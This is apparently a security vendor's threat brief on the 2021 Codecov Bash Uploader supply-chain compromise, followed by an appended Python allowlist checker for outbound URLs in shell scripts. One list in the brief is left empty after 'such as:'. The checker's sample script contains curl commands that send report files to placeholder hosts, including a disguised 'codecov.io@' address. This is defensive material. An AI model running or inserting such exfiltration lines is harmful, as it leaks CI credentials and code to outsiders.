Threat Brief: Codecov Bash Uploader
Published: April 23, 2021
On April 16, Codecov, an online platform and software company that provides code testing reports and statistics, disclosed that an adversary modified their Bash Uploader script. The Bash Uploader script allows its customers to send code coverage reports to the Codecov platform for analysis.
Codecov's investigation found that beginning January 31, a threat actor made periodic, unauthorized alterations to the Bash Uploader script. The script was modified to export information out of their users' continuous integration (CI) environments to a third-party server outside of Codecov's infrastructure. This information could include, but is not limited to, credentials, tokens, services, datastores and application code.
This incident is not limited to clients who only used the Bash Uploader script. This script can also be found in other tools such as:
As of the time of this writing, based on signatures and indicators that have been observed, Palo Alto Networks customers are protected across our product ecosystem, with specific protections deployed in the following products and subscriptions:
- Next-Generation Firewall
  - Threat Prevention: Anti-Spyware Signatures 86353 (Malicious Modified Shell Script Detection) and 86355 (Data Exfiltration Traffic Detection)
  - WildFire: WildFire blocks the malicious Bash Uploader Script
- Cortex XDR
  - Customers are protected via XDR analytical detection capabilities
- Cortex XSOAR
  - Codecov Breach - Bash Uploader (Rapid Breach Response Pack)
Organizations using Codecov's Bash Uploader script, or one of the other impacted tools, should carefully evaluate their exposure to this threat. We recommend customers take advantage of the protections listed above and implement the remediation actions recommended by Codecov to limit their impact.
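As one way to check a fetched uploader script for the kind of change described above (traffic to a server outside Codecov's infrastructure), the following added example, which is not code from Codecov or from this brief, lists every URL in a shell script whose host is off an allowlist. The allowlist entry `codecov.io`, the function names and the sample script are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only domain the uploader is expected to contact.
ALLOWED_DOMAINS = ("codecov.io",)

URL_RE = re.compile(r"""https?://[^\s"'`)<>|;]+""", re.IGNORECASE)

# Constructed sample, not the real uploader. Hosts are placeholders
# (RFC 5737 documentation addresses and example domains).
SAMPLE = '''#!/usr/bin/env bash
# docs: https://example.org/uploader
url="https://codecov.io"
curl -s -X POST "$url/upload/v4" -d @coverage.xml
curl -s "https://uploads.codecov.io/ping"
curl -s -d @report.txt "http://203.0.113.7/upload"
wget -q "https://codecov.io.example.net/x"
curl -s "https://codecov.io@198.51.100.9/y"
'''

def host_allowed(host, allowed=ALLOWED_DOMAINS):
    """True only for an allowed domain or a real subdomain of it."""
    host = host.lower().rstrip(".")
    # Match on a label boundary so "evilcodecov.io" does not pass.
    return any(host == d or host.endswith("." + d) for d in allowed)

def unexpected_destinations(script_text, allowed=ALLOWED_DOMAINS):
    """Return (line_number, host, line) for each URL with an off-allowlist host."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # comment lines do not execute
        for url in URL_RE.findall(line):
            # urlsplit drops any "user@" prefix, so the real host is compared.
            host = urlsplit(url).hostname or ""
            if not host_allowed(host, allowed):
                findings.append((lineno, host, line.strip()))
    return findings

if __name__ == "__main__":
    for lineno, host, line in unexpected_destinations(SAMPLE):
        print(f"line {lineno}: unexpected host {host!r}: {line}")
```

A clean result only covers literal URLs; hosts assembled from variables or encoded strings still need manual review or an egress control on the CI runner.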
